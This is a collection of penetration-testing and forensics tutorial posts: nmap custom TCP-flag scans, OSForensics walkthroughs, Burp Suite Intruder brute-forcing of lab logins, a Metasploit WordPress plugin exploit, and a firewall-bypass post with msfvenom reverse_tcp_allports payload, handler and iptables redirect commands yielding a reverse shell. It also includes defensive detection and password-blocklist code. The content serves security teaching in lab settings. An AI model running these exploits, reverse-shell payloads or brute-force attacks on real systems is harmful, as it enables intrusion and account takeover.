In this scan we send a combination of flags, expressed as a single hexadecimal value, to the target machine. As we know, an Xmas scan uses the combination of three TCP flags [FIN, PSH, URG] to enumerate the state of a port.

Adding the hex values of those flags gives the hex value that the sender places in the TCP flags field, as described in the table below.

Now execute the command below to enumerate the state of any port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x29 192.168.1.103

From the image below you can observe that we have found port 21 filtered.

When the network admin captures the incoming traffic he will see a packet with the TCP flags [FIN, PSH, URG]; here we have used Wireshark for network packet analysis and found that it shows a TCP packet with FIN, PSH, URG for hex value 0x29 coming from 192.168.1.104 on port 21, as shown in the image below.

Manual Combination of Flags [FIN, SYN, PSH]

Let's have a quick review of decimal to hexadecimal conversion with the help of the following table:

Now repeat the same methodology, changing the combination of flags to enumerate the state of any port. For example, we want to scan a port by sending a combination of three flags [FIN, SYN and PSH], so let's identify the hex value for the sum of the three flags.

Now execute the command below to enumerate the state of any port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x0B 192.168.1.103

From the image below you can observe that we have found port 21 filtered.

When the network admin captures the incoming traffic he will see a packet with the TCP flags [FIN, SYN and PSH]; here we have used Wireshark for network packet analysis and found that it shows a TCP packet with FIN, SYN, PSH for hex value 0x0B coming from 192.168.1.104 on port 21, as shown in the image below.

Manual Combination of Flags [FIN, RST, PSH]

Now repeat the same methodology, changing the combination of flags to enumerate the state of any port. For example, we want to scan a port by sending a combination of three flags [FIN, RST and PSH], so let's identify the hex value for the sum of the three flags.

Now execute the command below to enumerate the state of any port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x0D 192.168.1.103

From the image below you can observe that we have found port 21 filtered.

When the network admin captures the incoming traffic he will see a packet with the TCP flags [FIN, RST and PSH]; here we have used Wireshark for network packet analysis and found that it shows a TCP packet with FIN, RST, PSH for hex value 0x0D coming from 192.168.1.104 on port 21, as shown in the image below.

Manual Combination of Flags [FIN, SYN, RST, PSH]

Now repeat the same methodology, changing the combination of flags to enumerate the state of any port. For example, we want to scan a port by sending a combination of four flags [FIN, SYN, RST and PSH], so let's identify the hex value for the sum of the four flags.

Now execute the command below to enumerate the state of any port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x0F 192.168.1.103

From the image below you can observe that we have found port 21 filtered.

When the network admin captures the incoming traffic he will see a packet with the TCP flags [FIN, SYN, RST and PSH]; here we have used Wireshark for network packet analysis and found that it shows a TCP packet with FIN, SYN, RST, PSH for hex value 0x0F coming from 192.168.1.104 on port 21, as shown in the image below.
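The flag arithmetic used throughout this article, as an added example in Python that is not part of the original post: it builds the --scanflags value from flag names, decodes a value back to the flag list Wireshark displays, and reads the flags byte out of a constructed 20-byte TCP header. Bit values follow RFC 793; ECE and CWR are not in the article's table but are also accepted by nmap, and the scan names cover only the scans shown above.

```python
import struct
from typing import Dict, Iterable, List

# TCP flag bits in the order they sit in the header's flags byte (low bit first).
TCP_FLAGS: Dict[str, int] = {
    "FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08,
    "ACK": 0x10, "URG": 0x20, "ECE": 0x40, "CWR": 0x80,
}

# Scans named in the article, keyed by their flags byte.
NAMED_SCANS: Dict[int, str] = {
    0x00: "NULL", 0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH",
    0x10: "ACK", 0x20: "URG", 0x29: "XMAS",
}


def flags_to_value(names: Iterable[str]) -> int:
    """OR together the bit values of the given flag names: FIN+PSH+URG -> 0x29."""
    value = 0
    for name in names:
        try:
            value |= TCP_FLAGS[name.upper()]
        except KeyError:
            raise ValueError(f"unknown TCP flag: {name}") from None
    return value


def value_to_flags(value: int) -> List[str]:
    """Decode a flags byte back to names, low bit first: 0x0B -> FIN, SYN, PSH."""
    if not 0 <= value <= 0xFF:
        raise ValueError("TCP flags byte must be 0..255")
    return [name for name, bit in TCP_FLAGS.items() if value & bit]


def scanflags_hex(names: Iterable[str]) -> str:
    """The argument to pass to nmap --scanflags, e.g. '0x0F'."""
    return f"0x{flags_to_value(names):02X}"


def scan_name(value: int) -> str:
    """Name the scan a flags byte corresponds to, or label custom combinations."""
    return NAMED_SCANS.get(value, "custom:" + "+".join(value_to_flags(value)))


def nmap_command(names: Iterable[str], port: int, target: str) -> str:
    """Assemble the command line used in the article for a given flag set."""
    return f"nmap -p{port} --scanflags {scanflags_hex(names)} {target}"


def build_tcp_header(src_port: int, dst_port: int, names: Iterable[str]) -> bytes:
    """Constructed 20-byte TCP header with the given flags (no options, zero checksum)."""
    data_offset = 5 << 4  # 5 32-bit words = 20 bytes; low nibble reserved/NS left zero
    return struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, data_offset,
                       flags_to_value(names), 1024, 0, 0)


def flags_from_tcp_header(header: bytes) -> List[str]:
    """What Wireshark shows: the flags byte is byte 13 of the TCP header."""
    if len(header) < 20:
        raise ValueError("TCP header is at least 20 bytes")
    return value_to_flags(header[13])


if __name__ == "__main__":
    for combo in (["FIN", "PSH", "URG"], ["FIN", "SYN", "PSH"], ["FIN", "SYN", "RST", "PSH"]):
        value = flags_to_value(combo)
        print(nmap_command(combo, 21, "192.168.1.103"), "->", scan_name(value))
        print("  on the wire:", flags_from_tcp_header(build_tcp_header(40000, 21, combo)))
```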

Author: Rahul Virmani is a Certified Ethical Hacker and a researcher in the field of network penetration testing (cyber security). Contact Here

The post Nmap Scans using Hex Value of Flags appeared first on Hacking Articles.

Categories: Cyber India

Digital Forensics Investigation through OS Forensics (Part 2)

Tue, 30/Jan/2018 - 17:20

In Part 1 of this article we covered creating a case, File Search and Indexing. This article covers some more features and functionalities of OSForensics.

For Part 1 of this article, click here.

Recent Activity

The Recent Activity feature allows an investigator to scan the evidence for recent activity, such as accessed websites, USB drives, wireless networks, recent downloads and much more.

To start with open OSForensics and select Recent Activity.

We have an option to capture recent activity either through a live acquisition of the current machine or by scanning drives/evidence.

To capture the live acquisition of the current machine, select the first option and click on Scan. If we opted to investigate the case of another machine when creating the case (shown in Part 1 of this article), we may get a warning message as shown below; click on Yes to continue.

But we will be acquiring our evidence (the .E01 image file).

Scanning will start and may take some time to complete.

Once the scanning is complete we get a popup with the summary of the scanned evidence.

Click on the OK button, and in the Recent Activity window we can find all the recent activity details, with headings in the left pane and details of the related files on the right.

Below is the list view of the files.

We can also view the file details by clicking on the File Details tab.

To further analyse any file, simply right-click on it for further file options.


Similarly, we can investigate the recent activity of any particular drive.

We can also change the configuration or apply/remove filters as required, but these changes must be made before starting the scan.

To edit the configuration, click on the “Config” button located at the top right corner of the Recent Activity window.

Check/uncheck the options as required or, if needed, change the date/date range for a particular time-based activity, and click OK.

For managing the filters, click on the “Filters” button located below the “Config” button.

We can add a filter as required by selecting a value from the dropdown or filling in the details.

In the image below we have applied a filter and set its parameters as per requirement.

Click on the Add Filter button and then OK; the filter will be added.

This ends the Recent Activity feature.

Deleted File Search

Deleted file recovery is one of the prime requirements of digital forensics. OSF offers a very simple and efficient deleted file recovery/search.

To search for deleted files, click on "Deleted Files Search" and select the drive we want to search from the dropdown. We can select the complete physical drive/hard disk (PhysicalDrive0), the acquired evidence or any logical drive (C/D/E) from which we want to recover data.

Click on the "Config" button and check/uncheck the options as required. Select the quality from the dropdown (note that the higher the quality, the more time processing will take); for better results check the file carving option. We can also limit the file size we want to search for (files outside the range are omitted, which refines the search). Click OK.

On the Preset dropdown select the file type we want to recover/search. Select All Files if we need multiple file types in the output.

Once all the settings are done, click on Search. Depending on the volume of data and the configuration we opted for, it may take some time for the process to complete.

We can also see the thumbnail view of the files for faster analysis.

To save/recover files, select the files we want to recover, right click for options and save the files.

This concludes the Deleted File Search.

Mismatch File Search

This feature enables us to identify files whose extension does not match their content. Through this we can capture relevant evidence that is actually an image, document or PDF but pretends to have some other extension. For example a Word file can be mismatched as a JPEG file (such data is also referred to as "Dark Data").

To start, click on Mismatch File Search and select the drive/directory along with a filter from the dropdown, or create a filter as required. If we are not sure about the filter settings, we can go with the "All (Built In)" filter. Then click Search.

This shows the result in the file list. We can also see the thumbnail view of the files.
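Both the file carving option of Deleted File Search and the Mismatch File Search above rest on the same idea: a file's real type is given by the byte signature at its start, not by its extension. The following is an added example written for this article, not OSForensics code: a small signature table, a mismatch check, and a header/footer carver for JPEGs over a raw byte buffer. The signatures are the standard ones; the sample files and the raw chunk are constructed inline.

```python
"""Added example (not OSForensics code): signature-based file typing and a
minimal header/footer carver, showing what "mismatch file search" and
"file carving" do under the hood. Sample data below is constructed."""

# Leading byte signatures ("magic numbers") for a few common formats.
SIGNATURES = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
    "zip": b"PK\x03\x04",   # docx/xlsx/pptx are zip containers
}

# Extensions that legitimately share a signature with another type.
ALIASES = {"jpeg": "jpg", "docx": "zip", "xlsx": "zip", "pptx": "zip"}


def detect_type(data: bytes):
    """Return the signature-based type of data, or None if unknown."""
    for kind, magic in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def extension_mismatch(filename: str, data: bytes):
    """Return (claimed, actual) when the extension disagrees with the
    content signature; None when they agree or the content is unknown."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = ALIASES.get(ext, ext)
    actual = detect_type(data)
    if actual is None or actual == claimed:
        return None
    return (claimed, actual)


def scan_for_mismatches(files):
    """files: {name: bytes}. Returns {name: (claimed, actual)} for mismatches."""
    report = {}
    for name, data in files.items():
        mismatch = extension_mismatch(name, data)
        if mismatch:
            report[name] = mismatch
    return report


def carve_jpegs(blob: bytes):
    """Carve JPEG candidates out of raw bytes by scanning for the SOI marker
    (FF D8 FF) and the next EOI marker (FF D9). Returns (offset, length)
    pairs. Embedded thumbnails can make a carved file end early; that is the
    usual limitation of plain header/footer carving."""
    found, pos = [], 0
    while True:
        start = blob.find(SIGNATURES["jpg"], pos)
        if start < 0:
            break
        end = blob.find(b"\xff\xd9", start + 3)
        if end < 0:
            break
        found.append((start, end + 2 - start))
        pos = end + 2
    return found


# Constructed samples: a "document" that is really a PNG, a genuine tiny
# JPEG-like file, a text file, and a raw chunk with two JPEG fragments
# separated by unallocated junk.
SAMPLE_FILES = {
    "report.docx": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "photo.jpg": b"\xff\xd8\xff\xe0JFIF\xff\xd9",
    "notes.txt": b"plain text, no signature",
}
RAW_CHUNK = (b"\x00" * 10 + b"\xff\xd8\xff\xe0" + b"\x11" * 5 + b"\xff\xd9"
             + b"junk" + b"\xff\xd8\xff\xe1" + b"\x22" * 3 + b"\xff\xd9")

if __name__ == "__main__":
    print(scan_for_mismatches(SAMPLE_FILES))  # {'report.docx': ('zip', 'png')}
    print(carve_jpegs(RAW_CHUNK))             # [(10, 11), (25, 9)]
```

A production tool extends the table to hundreds of signatures and also checks trailers and internal structure, but the decision rule is the one shown: the claimed type comes from the name, the actual type from the bytes, and an investigator looks at every file where the two disagree.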

Memory Viewer

The Memory Viewer feature shows the active memory of the system on which OSF is running. It cannot be used to show the memory of an acquired image or a drive from another computer (so we will illustrate this feature on our running machine and not on our evidence file). We can dump the live memory/RAM for further investigation.

To start, open OSF and click on Memory Viewer. We can see the list of all processes currently running along with their Process ID (PID). Click on any process to see its details under Process Info. Click on Refresh to refresh the process list.

Click on Select Window; the cursor icon will change from a pointer to a circle. Click anywhere on screen or on any other running application and we can see the details of the process we clicked on. For instance, in the image below we clicked on an open Word file and the process corresponding to that Word file is displayed.

Click on Dump Physical Memory; this dumps the physical memory/RAM to a .bin file, which can be saved anywhere. In the image below we are saving the file with the name Memory Dump.bin in a folder named Physical Memory Dump on the Desktop.

As we click on Save, a popup will appear while the memory is being dumped.

Once completed, we get a success message.

We can also save a crash dump: just browse to a directory and save the file. The extension of the crash dump file is .dmp. In the image below we are saving a crash dump file with the name CrashDump.dmp. We get the following message while the dump is in progress.

Once the dump is completed we get a success message.

This concludes the Memory Viewer.

Prefetch Viewer

The Prefetch Viewer displays the .exe files that were last executed on the system. To start, open OSForensics and click on Prefetch Viewer.

We can browse the drive from the dropdown to check the .exe files that have been executed on a particular drive. We can click on any particular entry and see the details of the exe along with its mapped files under the Mapped Files tab.

We can also view the directories mapped with the .exe file under the Mapped Directory tab.

This concludes the Prefetch Viewer.

For more on OSForensics wait for the next article.

Author: Ankit Gupta, the author and co-founder of this website, an ethical hacker, forensics investigator, penetration testing researcher and telecom expert. He has found his deepest passion to be around the world of telecom, cyber security and digital forensics. Contact Here

The post Digital Forensics Investigation through OS Forensics (Part 2) appeared first on Hacking Articles.

Categories: Cyber India

WordPress Exploitation using Burpsuite (Burp_wp Plugin)

Tue, 30/Jan/2018 - 15:18

Burp_wp is an extension for Burp Suite used to scan for and find vulnerabilities in WordPress plugins and themes via the Burp Suite proxy. It was created by Kacper Szurek and can be downloaded from here.

Let’s begin

To run this extension we first need to install Jython. Jython is an implementation of the Python programming language that runs on the Java platform. You can download Jython from here.

Now we add Jython to Burp Suite: in the Python Environment setting we locate the Jython jar file.

Now we go to Extender and select the Extensions tab to add the burp_wp extension.

We click on Add and a popup appears. We select Python as the extension type and give the location of the burp_wp file. We select "Show in UI" for standard output and error so that any errors are visible.

As soon as the extension is installed we get the message shown in the image below, which confirms it was installed successfully.

Now we get a new "Burp WP" tab. Burp_WP updates automatically the first time it is installed: it downloads the list of vulnerable plugins and themes from the WPScan database.

Now we intercept the request of the website we want to scan for vulnerabilities.

As soon as we forward the request we go to the Burp WP tab, where we can find the vulnerable plugins and themes on the website. More vulnerable plugins and themes are listed as we browse through the site.

Now we use Metasploit to exploit this vulnerability.

msf > use exploit/unix/webapp/wp_nmediawebsite_file_upload

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > set rhost 192.168.1.143

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > run

As soon as we run this exploit we get the reverse shell.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post WordPress Exploitation using Burpsuite (Burp_wp Plugin) appeared first on Hacking Articles.


Beginners Guide to Burpsuite Payloads (Part 2)

Mon, 29/Jan/2018 - 21:27

Hello Friends!! In our previous article (Part 1) we discussed how to perform a brute force attack on a web application login using some of the payload types of Burp Suite. In Part 2 you will learn more about brute force attacks with the help of the remaining Burp Suite payload types, which may be helpful in other situations.

Let’s Start!!

Character Substitution

This type of payload allows you to configure a list of strings and apply various character substitutions to each item. It is useful in password guessing attacks and for generating common variations on dictionary words.

The UI of this payload type allows you to configure a number of character substitutions. For each item, it generates a number of payloads, which include all permutations of substituted characters according to the defined substitutions.

For example, with the default substitution rules (which include e > 4 and r > 5), the item "Raj Chandel" will generate the following payloads:

raj chandel

5aj chandel

raj chand4l

5aj chand4l

First, we intercept the request of the login page in the DVWA lab, where we have given the default username and a wrong password. Then click on Login; Burp Suite captures the request of the login page in the Intercept tab.

Send the captured request to the Intruder by clicking on the Action tab and follow the steps given below. Now open the Intruder tab and select the Positions tab; you can observe the highlighted password. Follow the steps given below to select the payload position.

  • Press the Clear button at the right of the window frame.
  • Now select the field we want to attack, i.e. the password field, and click on the Add button.
  • Choose the Attack type as
  • In the image below we have selected password, which means we will need one dictionary file for the password.

Now click on the Payloads option after selecting the payload position. Here we can add a dictionary by clicking on the Load option, or add strings manually by clicking on the Add option.

Now we have set the substitutions 4>a, 5>s, 9>o as required to match the password, and added the input p445w9rd using the Add option; the characters will be substituted according to the defined substitutions as shown in the image.

Click Start Attack in the Intruder menu as shown in the image.

Sit back and relax: Burp Suite will do its work, match the password and give you the correct password. The moment it finds the correct value, the value of Length changes as shown.

To confirm the password matched, we enter the matched password on the DVWA lab login page. We see the message "Welcome to the password protected area admin", which shows our success with the Character Substitution payload attack.

Copy Other Payload

This payload type copies the value of the current payload to another payload position. It is useful for attack types that have multiple payload sets, such as Cluster bomb, Pitchfork and Battering ram. This payload type can be useful in various situations, for example:

  • Suppose we are using two different parameters and want to attack two different fields. We can set different payload types for the multiple payload sets in the Burp Suite payload configuration as per our attack type; this payload type lets us simply use the same dictionary for both payloads by giving the position of the payload we want to copy. It will execute the complete payload that is set at that position.

First, we intercept the request of the login page in the bWAPP lab, where we have given a wrong username and password. Then click on Login; Burp Suite captures the request of the login page in the Intercept tab.

Send the captured request to the Intruder by clicking on the Action tab and follow the steps given below. Now open the Intruder tab and select the Positions tab; you can observe the highlighted username and password. Follow the steps given below to select the payload positions.

  • Press the Clear button at the right of the window frame.
  • Now select the fields we want to attack, which are the username and password, and click on the Add button.
  • Choose the Attack type as Cluster Bomb.
  • In the image below we have selected username and password, which means we will need two dictionary files, one for the username and a second for the password.

Now click on the Payloads option after selecting the payload positions; here we need to add a dictionary that will be used for both payload sets. Select the Payload type Simple list for Payload Set 1, which will attack the username field.

Now, to attack the password field, select the Payload type Copy other payload for Payload Set 2, because we want the same payloads at payload set 2: it copies the dictionary given for Payload Set 1.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax: Burp Suite will do its work, match the username and password and give you the correct ones. The moment it finds the correct values, the value of Length changes as shown in the image.

To confirm the credentials matched, you can enter them on the bWAPP lab login page.

Username Generator

This payload type allows you to set up a list of names or email addresses, and produces usernames from them using a set of common schemes.

For example, the name "raj chandel" can produce up to 115 possible usernames; some combinations are as follows:

rajchandel

raj.chandel

chandelraj

chandel.raj

chandel

raj

rajc

etc…

This payload type is useful when targeting a specific user where you do not know the username or email address scheme used by the application.

First, we intercept the request of the login page in the bWAPP lab, where we have given a wrong username and password. Then click on Login; Burp Suite captures the request of the login page in the Intercept tab.

Send the captured request to the Intruder by clicking on the Action tab and follow the steps given below. Now open the Intruder tab and select the Positions tab; you can observe the highlighted username and password. Follow the steps given below to select the payload positions.

  • Press the Clear button at the right of the window frame.
  • Now select the fields we want to attack, which are the username and password, and click on the Add button.
  • Choose the Attack type as Cluster Bomb.
  • In the image below we have selected username and password, which means we will need two dictionary files, one for the username and a second for the password.

Then select the Payload type "Username Generator" for Payload Set 1, which will attack the username field. We have given the input string "raj chandel" using the Add option as shown in the image; the generator applies different permutations to that input string to match the correct username.

Now, to attack the password field, select the Payload type Simple list for Payload Set 2, for which we have added a dictionary created manually by us using the Load option.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax: Burp Suite will do its work, match the username and password and give you the correct ones. The moment it finds the correct values, the value of Length changes as shown in the image.

Dates

This payload type generates date payloads within a given range and in a specified format. It can be used in data mining or brute forcing.

For example, it can be used to guess a user's birth date, wedding date, anniversary etc., which can be used to brute force the security questions of an application or web application, or to brute force the passwords of users who use dates as their password.

The following options are available in this payload type:

  • From – The first date that will be generated.
  • To – The last date that will be generated.
  • Step – The increment between sequential dates, in days, weeks, months or years. It must be a positive value.
  • Format – The format in which dates are represented. We can select from different predefined date formats, or make our own custom date format as per our requirement. Some examples of the format symbols are given below:
      E: Mon
      EEEE: Monday
      D: 2
      dd: 02
      M: 9
      MM: 09

Repeat the same steps to intercept the request of the login page in the bWAPP lab, where we have given a wrong username and password. Then click on Login; Burp Suite captures the request of the login page in the Intercept tab.

Send the captured request to the Intruder by clicking on the Action tab and follow the steps given below. Now open the Intruder tab and select the Positions tab; you can observe the highlighted username and password. Follow the steps given below to select the payload positions.

  • Press the Clear button at the right of the window frame.
  • Now select the fields we want to attack, which are the username and password, and click on the Add button.
  • Choose the Attack type as Cluster Bomb.
  • In the image below we have selected username and password, which means we will need two dictionary files, one for the username and a second for the password.

Then select the Payload type Simple list for Payload Set 1, which will attack the username field; here we have given a dictionary as input, as shown in the image below.

Now, to attack the password field, select the Payload type Dates for Payload Set 2, because we are guessing that the user might have their birth date or some other date as a password.

After this we set the inputs for Payload Set 2 in the fields given in the payload options, such as From, To, Step and Format, as shown in the image.

Now select Start Attack in the Intruder menu to start the brute force attack.

Sit back and relax: Burp Suite will do its work, match the username and password and give you the correct ones. The moment it finds the correct values, the value of Length changes as shown in the image.
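The Character Substitution and Dates sections above describe exactly the candidate sets an Intruder run enumerates, which means an application can refuse those candidates up front. The following is an added example for this article, not Burp Suite's code: a password-policy check that expands a small dictionary through the same "character > replacement" permutation Character Substitution uses, adds every date in a range in several formats the way the Dates payload does, and rejects any new password that lands in that set. The dictionary, substitution rules, date formats and year range are constructed for the example; Burp's own format patterns are Java-style (ddMMyyyy), so the equivalent strftime patterns are used here.

```python
"""Added example (not Burp Suite's code): reject passwords that the
Character Substitution or Dates payload types described above would
enumerate. Dictionary, rules, formats and year range are constructed."""
import itertools
from datetime import date, timedelta


def substitution_variants(item, rules):
    """Every variant of item in which each character that has a rule is
    either kept or replaced: 2**k strings for k rule-matching positions,
    which is the set Burp's Character Substitution payload generates."""
    choices = [(c, rules[c]) if c in rules else (c,) for c in item]
    return {"".join(p) for p in itertools.product(*choices)}


def date_payloads(start, end, step_days, fmt):
    """Dates from start to end inclusive, every step_days days, rendered with
    a strftime format (%d%m%Y is the equivalent of Burp's ddMMyyyy)."""
    out, d = [], start
    while d <= end:
        out.append(d.strftime(fmt))
        d += timedelta(days=step_days)
    return out


# Constructed rules in the "character > replacement" sense of the Burp UI,
# matching the 4>a, 5>s, 9>o idea used in the walkthrough above.
LEET_RULES = {"a": "4", "s": "5", "o": "0", "e": "3", "i": "1"}
# Constructed set of formats in which people commonly type dates.
DATE_FORMATS = ("%d%m%Y", "%d-%m-%Y", "%d/%m/%Y", "%Y%m%d", "%m%d%Y", "%d%m%y")


def build_blocklist(dictionary, rules, first_year, last_year):
    """Union of all substitution variants of each dictionary word and all
    dates between first_year and last_year in every DATE_FORMATS pattern."""
    block = set()
    for word in dictionary:
        block |= substitution_variants(word.lower(), rules)
    start, end = date(first_year, 1, 1), date(last_year, 12, 31)
    for fmt in DATE_FORMATS:
        block.update(date_payloads(start, end, 1, fmt))
    return block


def is_weak(candidate, blocklist):
    """True when the candidate (case-insensitively) is in the blocklist."""
    return candidate.lower() in blocklist


if __name__ == "__main__":
    # Constructed dictionary; a real deployment uses a breached-password list.
    bl = build_blocklist(["password", "welcome", "summer"], LEET_RULES, 1960, 2005)
    for pw in ("P455w0rd", "15-06-1990", "correct horse battery staple"):
        print(pw, "weak" if is_weak(pw, bl) else "ok")
```

The blocklist grows as 2**k per dictionary word and as years x formats x 365 for dates, which is cheap to hold in a set; the point for a defender is that a "clever" substitution of a dictionary word, or a date in any common layout, is still a single Intruder run away, so a length rule alone does not protect the login page shown above.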

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Beginners Guide to Burpsuite Payloads (Part 2) appeared first on Hacking Articles.


Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports)

Mon, 29/Jan/2018 - 15:06
Introduction

Network Address Translation generally involves "re-writing the source and/or destination addresses of IP packets as they pass through a router or firewall" (from http://en.wikipedia.org/wiki/Network_Address_Translation).

The Linux kernel has a packet filter framework called netfilter (project home: netfilter.org). This framework enables a Linux machine with an appropriate number of network cards (interfaces) to become a router capable of NAT. We will use the command line utility 'iptables' to create complex rules for the modification and filtering of packets. The important rules regarding NAT are, not very surprisingly, found in the 'nat' table. This table has three predefined chains: PREROUTING, OUTPUT and POSTROUTING.

ALL-PORTS payload

'reverse_tcp' only connects back to a single port; if the victim has blocked outgoing connections except on a few ports, it becomes difficult for the attacker to choose a port to listen on. 'reverse_tcp_allports' instead tries every port in the range 1-65535 in turn.

We use iptables to reroute any incoming connection to the listening port.

Let’s begin

We use Metasploit to create a Meterpreter reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp_allports lhost=192.168.1.139 lport=4444 -f exe > reverse_shell.exe

We now set up our listener using Metasploit.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_allports

msf exploit(multi/handler) > set lhost 192.168.1.139

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

Now we set up the firewall on our Windows machine. We open the firewall and select outbound connections.

We select Port to define the ports we need to block.

We select TCP to block TCP packets, and enter the port range 4444-5555.

Now we select 'Block the connection' to block all outgoing traffic on these ports.

Now we select the types of connection the firewall rule applies to.

We now name the firewall rule "REVERSE_SHELL" and click Finish to apply the rule.

Now we define an iptables rule to reroute all traffic arriving on ports 4444-5556 to port 4444, so that when the reverse shell reaches our system on port 5556 it is rerouted to port 4444.

iptables -A PREROUTING -t nat -p tcp --dport 4444:5556 -j REDIRECT --to-port 4444

As soon as the victim runs the file we get our reverse shell.
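From the defender's side, the walk from 4444 up to the first unblocked port described above is visible in the host firewall log: one internal host attempting the same external address on a run of neighbouring ports in a few seconds, most of them dropped, followed by one allowed connection. The following is an added example written for this article, not Metasploit or Windows code: it parses constructed log lines laid out in the field order of the Windows Firewall pfirewall.log format (date, time, action, protocol, src-ip, dst-ip, src-port, dst-port, ...) and flags such sweeps. The hosts, ports and timestamps are constructed; a real log only contains DROP lines if "Log dropped packets" is enabled in the firewall profile properties.

```python
"""Added example (not from the article): spot the outbound port walk of an
all-ports reverse shell in a host firewall log. Log lines are constructed
in pfirewall.log field order; parsing uses only the first 8 fields."""
from collections import defaultdict
from datetime import datetime


def parse_line(line):
    """Parse one pfirewall.log record; returns None for headers/comments."""
    parts = line.split()
    if len(parts) < 8 or parts[0].startswith("#"):
        return None
    ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S")
    return {"ts": ts, "action": parts[2], "proto": parts[3],
            "src": parts[4], "dst": parts[5], "dport": int(parts[7])}


def longest_consecutive_run(sorted_ports):
    """Length of the longest run of adjacent port numbers (4444, 4445, ...)."""
    if not sorted_ports:
        return 0
    best = run = 1
    for a, b in zip(sorted_ports, sorted_ports[1:]):
        run = run + 1 if b == a + 1 else 1
        best = max(best, run)
    return best


def find_port_sweeps(lines, min_ports=5, window_s=60):
    """Flag (src, dst) pairs whose TCP attempts hit at least min_ports distinct
    destination ports within window_s seconds. A run of adjacent ports is the
    signature of reverse_tcp_allports bumping into an outbound block list
    until it reaches a port that is allowed out."""
    by_pair = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["proto"] == "TCP":
            by_pair[(rec["src"], rec["dst"])].append(
                (rec["ts"], rec["dport"], rec["action"]))
    alerts = []
    for (src, dst), events in by_pair.items():
        events.sort()
        for i, (t0, _, _) in enumerate(events):
            window = [e for e in events[i:]
                      if (e[0] - t0).total_seconds() <= window_s]
            ports = sorted({p for _, p, _ in window})
            if len(ports) >= min_ports:
                alerts.append({
                    "src": src, "dst": dst,
                    "first_port": ports[0], "last_port": ports[-1],
                    "distinct_ports": len(ports),
                    "longest_run": longest_consecutive_run(ports),
                    "dropped": sum(1 for e in window if e[2] == "DROP"),
                    "allowed": sum(1 for e in window if e[2] == "ALLOW"),
                })
                break  # one alert per (src, dst) pair is enough
    return alerts


# Constructed log excerpt: 192.168.1.143 walks 4444..4449 (dropped by the
# outbound rule) and then gets out on 5556; a second host does normal browsing.
LOG_LINES = """\
#Version: 1.5
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2018-01-29 15:06:01 DROP TCP 192.168.1.143 192.168.1.139 49731 4444 52 S 2381102849 0 8192 - - - SEND
2018-01-29 15:06:01 DROP TCP 192.168.1.143 192.168.1.139 49732 4445 52 S 2381102850 0 8192 - - - SEND
2018-01-29 15:06:02 DROP TCP 192.168.1.143 192.168.1.139 49733 4446 52 S 2381102851 0 8192 - - - SEND
2018-01-29 15:06:02 DROP TCP 192.168.1.143 192.168.1.139 49734 4447 52 S 2381102852 0 8192 - - - SEND
2018-01-29 15:06:03 DROP TCP 192.168.1.143 192.168.1.139 49735 4448 52 S 2381102853 0 8192 - - - SEND
2018-01-29 15:06:03 DROP TCP 192.168.1.143 192.168.1.139 49736 4449 52 S 2381102854 0 8192 - - - SEND
2018-01-29 15:06:09 ALLOW TCP 192.168.1.143 192.168.1.139 49737 5556 0 - 0 0 0 - - - SEND
2018-01-29 15:06:05 ALLOW TCP 192.168.1.143 192.168.1.10 49740 443 0 - 0 0 0 - - - SEND
2018-01-29 15:07:30 ALLOW TCP 192.168.1.143 192.168.1.10 49741 80 0 - 0 0 0 - - - SEND
""".splitlines()

if __name__ == "__main__":
    for alert in find_port_sweeps(LOG_LINES):
        print(alert)
```

The mitigation follows from the same observation: blocking a port range, as the Windows rule above does, merely delays the payload by a thousand dropped SYNs, whereas default-deny egress with an explicit allowlist of destinations leaves it no port to land on at all.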

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports) appeared first on Hacking Articles.


Digital Forensics Investigation using OS Forensics (Part1)

Mon, 29/Jan/2018 - 12:45

About OSForensics

OSForensics from PassMark Software is a digital forensics application which lets you extract and analyse digital evidence efficiently and with ease. It discovers, identifies and manages, i.e. uncovers, everything hidden inside your computer systems and digital storage devices.

OSForensics is a self-contained, standalone toolkit which has almost all the digital forensics capabilities, including data acquisition, extraction, analysis, email analysis, disk imaging, image restoration and much more.

In this article we will cover all the major capabilities of OSForensics for digital forensics investigations.

Discovering OSForensics

To start, open OSForensics; we can see the OSForensics window open.

On the left hand side are the main options/capabilities of OSForensics, which we will be talking about in detail.

Please note that the Start option highlights the main, widely used tools of OSF; the same options can also be accessed through the tabs on the left pane.

The first option is Manage Case:

Whatever task/operation we want to perform in OSF, it is always advisable to create a case for it. Creating a case also helps to distinguish multiple processes/operations from one another, and acts as a container of the work done, which is helpful for future reference.

To create a new case, click on the Create Case icon in the Start option or the New Case button in the Manage Case option and provide all the relevant details of the case. Also note the location where we want to save the case.

Enter all the details and click on OK; we can see the case getting listed. If we are working on more than one case at a time, or have multiple cases listed in OSF, we need to select which case to work on. To do this, select the case and click on Load Case; we will see a green check mark against the case which is presently loaded.

